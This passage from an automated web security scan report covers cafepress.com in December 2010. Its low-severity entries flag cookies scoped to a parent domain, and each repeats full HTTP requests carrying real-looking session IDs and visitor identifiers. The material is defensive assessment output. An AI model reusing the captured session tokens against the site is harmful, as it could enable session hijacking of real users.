__utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 63735
Date: Sun, 26 Dec 2010 13:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/
Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 63735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.18. http://www.cafepress.com/+greeting_cards

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+greeting_cards

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+greeting_cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59651
Date: Sun, 26 Dec 2010 13:48:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/
Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.19. http://www.cafepress.com/+hats-caps

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+hats-caps

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+hats-caps HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59393
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/
Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.20. http://www.cafepress.com/+ipad-cases

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+ipad-cases

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+ipad-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 88266
Date: Sun, 26 Dec 2010 13:44:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 88266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.21. http://www.cafepress.com/+iphone-cases

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+iphone-cases

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 65212
Date: Sun, 26 Dec 2010 13:48:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.22. http://www.cafepress.com/+journals

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+journals

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59322
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.23. http://www.cafepress.com/+keepsake_boxes

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+keepsake_boxes

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 59018
Date: Sun, 26 Dec 2010 13:48:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.24. http://www.cafepress.com/+license_plate_frames

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+license_plate_frames

Issue detail

